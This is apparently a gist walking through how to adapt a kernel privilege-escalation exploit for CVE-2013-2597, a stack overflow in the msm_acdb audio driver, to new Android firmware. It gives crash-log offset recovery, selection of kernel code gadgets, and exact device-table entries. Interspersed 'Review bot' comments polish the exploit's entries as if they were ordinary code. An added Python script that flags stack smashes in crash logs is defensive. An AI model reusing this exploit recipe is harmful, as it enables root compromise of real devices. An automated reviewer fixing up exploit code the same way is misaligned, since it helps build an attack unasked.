@fi01
Created July 28, 2013 04:42
Stack-based buffer overflow in acdb audio driver (CVE-2013-2597)
To use the msm_acdb exploit we need to work through 4 steps.
1. Find how to run a command with root or system privilege
2. Get the offset of each register to set up
3. Choose proper code in the kernel image
4. Set up the parameters in acdb.c
1. Find how to run a command with root or system privilege
Do it yourself. :-P
2. Get the offset of each register to set up
- Add a dummy entry to get a crash log.
--- a/acdb.c
+++ b/acdb.c
@@ -43,6 +43,7 @@ static supported_device supported_devices[] = {
{ DEVICE_SH04E_01_00_02, { 0x7c, 0x88, { 0x8c, 0xc02498e0 }, { 0xac, 0xc000dd1c } } },
{ DEVICE_SH04E_01_00_03, { 0x7c, 0x88, { 0x8c, 0xc0249a20 }, { 0xac, 0xc024bdd8 } } },
{ DEVICE_SH04E_01_00_04, { 0x7c, 0x88, { 0x8c, 0xc0249a20 }, { 0xac, 0xc024bdd8 } } },
+ { DEVICE_SH05E_01_00_05, { 0, 0, { 0, 0}, { 0, 0} } },
{ DEVICE_SO04D_7_0_D_1_137, { 0x80, 0x90, { 0x9c, 0xc0326a38 }, { 0xbc, 0xc0526964 } } },
{ DEVICE_SO05D_7_0_D_1_137, { 0x80, 0x90, { 0x9c, 0xc03265d8 }, { 0xbc, 0xc0524d84 } } },
{ DEVICE_SOL21_9_1_D_0_395, { 0x7c, 0x88, { 0x8c, 0xc0244778 }, { 0xac, 0xc000dd24 } } },
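Review bot: the added DEVICE_SH05E_01_00_05 line is an all-zero probe entry (every offset and address is 0) whose only purpose, per the surrounding text, is to crash the kernel and dump registers; mark it as temporary with a comment so it is not committed as a supported device, and keep the brace spacing consistent with the neighbouring entries (`{ 0, 0}` vs `{ 0x8c, 0xc0249a20 }`).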
- Build the tool
- Stop services to avoid losing data
- Run the tool with root or system privilege
The device will reboot because the tool causes a kernel panic.
- Read the crash log
(e.g. /proc/last_kmsg or the log partition)
<3>[ 348.770486] ACDB=> ACDB ioctl not found!
<1>[ 348.770547] Unable to handle kernel NULL pointer dereference at virtual address 0000009c
<1>[ 348.770608] pgd = df18c000
<1>[ 348.770639] [0000009c] *pgd=9b727831, *pte=00000000, *ppte=00000000
<0>[ 348.770700] Internal error: Oops: 80000007 [#1] PREEMPT SMP
<4>[ 348.770761] Modules linked in:
<4>[ 348.770791] CPU: 0 Not tainted (3.0.8 #1)
<4>[ 348.770853] PC is at 0x9c
<4>[ 348.770883] LR is at acdb_ioctl+0x740/0x860
<4>[ 348.770944] pc : [<0000009c>] lr : [<c0137658>] psr: 60000013
<4>[ 348.770944] sp : ce513f28 ip : 00000000 fp : 00000098
<4>[ 348.771005] r10: 00000094 r9 : 00000090 r8 : 0000008c
<4>[ 348.771066] r7 : 00000088 r6 : 00000084 r5 : 00000080 r4 : 0000007c
<4>[ 348.771097] r3 : 00000000 r2 : ce513e74 r1 : c0973db8 r0 : 00000000
<4>[ 348.771158] Flags: nZCv IRQs on FIQs on Mode SVC_32 ISA ARM Segment user
You'll find the buffer offset for each register in the register values of the dump:
R4 : 0x7c
R5 : 0x80
R6 : 0x84
R7 : 0x88
R8 : 0x8c
R9 : 0x90
R10: 0x94
R11: 0x98
PC : 0x9c
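An added triage example (not part of fi01's gist) that parses the register dump above as it would appear in /proc/last_kmsg and flags the two indicators of a stack smash visible in it: a pc that is not a kernel address, and callee-saved registers holding consecutive word offsets. The sample log is constructed from the lines quoted above; KERNEL_BASE (0xc0000000) is an assumed 3G/1G split for this 32-bit ARM 3.0.x kernel.

```python
import re

# Assumed 3G/1G split for this 32-bit ARM 3.0.x kernel: kernel text lives above this.
KERNEL_BASE = 0xC0000000

# Constructed sample, abridged from the last_kmsg lines quoted above.
SAMPLE_OOPS = """\
<3>[  348.770486] ACDB=> ACDB ioctl not found!
<1>[  348.770547] Unable to handle kernel NULL pointer dereference at virtual address 0000009c
<1>[  348.770608] pgd = df18c000
<0>[  348.770700] Internal error: Oops: 80000007 [#1] PREEMPT SMP
<4>[  348.770791] CPU: 0    Not tainted  (3.0.8 #1)
<4>[  348.770853] PC is at 0x9c
<4>[  348.770883] LR is at acdb_ioctl+0x740/0x860
<4>[  348.770944] pc : [<0000009c>]    lr : [<c0137658>]    psr: 60000013
<4>[  348.770944] sp : ce513f28  ip : 00000000  fp : 00000098
<4>[  348.771005] r10: 00000094  r9 : 00000090  r8 : 0000008c
<4>[  348.771066] r7 : 00000088  r6 : 00000084  r5 : 00000080  r4 : 0000007c
<4>[  348.771097] r3 : 00000000  r2 : ce513e74  r1 : c0973db8  r0 : 00000000
"""

PREFIX_RE = re.compile(r"^<\d>\[\s*[\d.]+\]\s*")  # "<4>[  348.770944] " loglevel + timestamp
# "r4 : 0000007c", "r10: 00000094", "sp : ce513f28", "pc : [<0000009c>]"
REG_RE = re.compile(r"\b(r\d{1,2}|sp|ip|fp|pc|lr)\s*:\s*(?:\[<)?([0-9a-f]{8})(?:>\])?")
FAULT_ADDR_RE = re.compile(r"at virtual address ([0-9a-f]{8})")
LR_SYM_RE = re.compile(r"^LR is at (\S+)")


def parse_oops(text):
    """Parse the register dump of an ARM Oops into {"regs": {...}, "fault_addr": ..., "lr_symbol": ...}."""
    info = {"regs": {}}
    for raw in text.splitlines():
        line = PREFIX_RE.sub("", raw)
        m = FAULT_ADDR_RE.search(line)
        if m:
            info["fault_addr"] = int(m.group(1), 16)
        m = LR_SYM_RE.match(line)
        if m:
            info["lr_symbol"] = m.group(1)
        for name, value in REG_RE.findall(line):
            info["regs"][name] = int(value, 16)
    return info


def classify(info):
    """Return the indicators that this Oops is a stack smash rather than a plain driver bug."""
    regs = info["regs"]
    findings = []
    pc = regs.get("pc")
    if pc is not None and pc < KERNEL_BASE:
        findings.append("pc=0x%08x is below KERNEL_BASE: execution left the kernel image" % pc)
    # Registers an ARM epilogue restores from the stack (LDM sp!, {r4-r10, fp, pc} shape).
    restored = [regs.get("r%d" % i) for i in range(4, 11)] + [regs.get("fp"), regs.get("pc")]
    if None not in restored and {b - a for a, b in zip(restored, restored[1:])} == {4}:
        findings.append("r4-r10, fp and pc hold consecutive word offsets 0x%x..0x%x: "
                        "they were restored from a buffer copied over the stack frame"
                        % (restored[0], restored[-1]))
    if "lr_symbol" in info:
        findings.append("last kernel function before the bad jump: " + info["lr_symbol"])
    return findings


def main():
    info = parse_oops(SAMPLE_OOPS)
    for reg in ("r4", "r5", "r6", "r7", "r8", "r9", "r10", "fp", "pc"):
        print("%-3s: 0x%02x" % (reg, info["regs"][reg]))
    for finding in classify(info):
        print("-", finding)


if __name__ == "__main__":
    main()
```

To run it against a real log, replace SAMPLE_OOPS with the contents of /proc/last_kmsg; an Oops whose pc lies inside the kernel image and whose callee-saved registers hold unrelated values yields no finding beyond the LR symbol, which is the normal shape of an ordinary driver crash.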
- Disassemble do_vfs_ioctl and check its return (epilogue) code
c021d8fc: e2 8d d0 44 ADD SP, SP, #$44
c021d900: e8 bd 83 f0 LDMUW [SP], { R4-R9, PC }
You'll find it adds 0x44 bytes to SP and restores registers R4-R9 and PC.
3. Choose proper code in kernel image
- Choose, from the kernel image, code that writes a value and code that ends do_vfs_ioctl
Together they should use the same stack size and restore the same registers as do_vfs_ioctl, like this:
write code: uses R9 as the write address and R5 as the write value, and uses 0x20 bytes of stack
c0381b98: e5 89 50 00 STR R5, [R9]
c0381b9c: e8 bd 87 f0 LDMUW [SP], { R4-R10, PC }
end do_vfs_ioctl code: uses 0x24 bytes (= 0x44 - 0x20) and restores R4-R9 and PC
c0231b98: e2 8d d0 24 ADD SP, SP, #$24
c0231b9c: e8 bd 83 f0 LDMUW [SP], { R4-R9, PC }
4. Set up the parameters in acdb.c
- Set up the parameters in acdb.c
Write value comes from R5, offset = 0x80
Write address comes from R9, offset = 0x90
Write code is at offset 0x9c, address = 0xc0381b98
End do_vfs_ioctl code is at offset 0xbc (= 0x9c + 0x20), address = 0xc0231b98
--- a/acdb.c
+++ b/acdb.c
@@ -43,6 +43,7 @@ static supported_device supported_devices[] = {
{ DEVICE_SH04E_01_00_02, { 0x7c, 0x88, { 0x8c, 0xc02498e0 }, { 0xac, 0xc000dd1c } } },
{ DEVICE_SH04E_01_00_03, { 0x7c, 0x88, { 0x8c, 0xc0249a20 }, { 0xac, 0xc024bdd8 } } },
{ DEVICE_SH04E_01_00_04, { 0x7c, 0x88, { 0x8c, 0xc0249a20 }, { 0xac, 0xc024bdd8 } } },
+ { DEVICE_SH05E_01_00_05, { 0x80, 0x90, { 0x9c, 0xc0381b98 }, { 0xbc, 0xc0231b98} } },
{ DEVICE_SO04D_7_0_D_1_137, { 0x80, 0x90, { 0x9c, 0xc0326a38 }, { 0xbc, 0xc0526964 } } },
{ DEVICE_SO05D_7_0_D_1_137, { 0x80, 0x90, { 0x9c, 0xc03265d8 }, { 0xbc, 0xc0524d84 } } },
{ DEVICE_SOL21_9_1_D_0_395, { 0x7c, 0x88, { 0x8c, 0xc0244778 }, { 0xac, 0xc000dd24 } } },
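Review bot: the new `{ 0xbc, 0xc0231b98}` field is missing the space before its closing brace that every other entry in the table uses; fix it to `{ 0xbc, 0xc0231b98 }`. Note also that the two addresses are specific to this build's kernel image (the neighbouring entries for other firmware versions use different addresses at the same offsets), so the entry must stay bound to the exact DEVICE_SH05E_01_00_05 identifier and not be copied to a sibling build.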
That's all. Have fun!!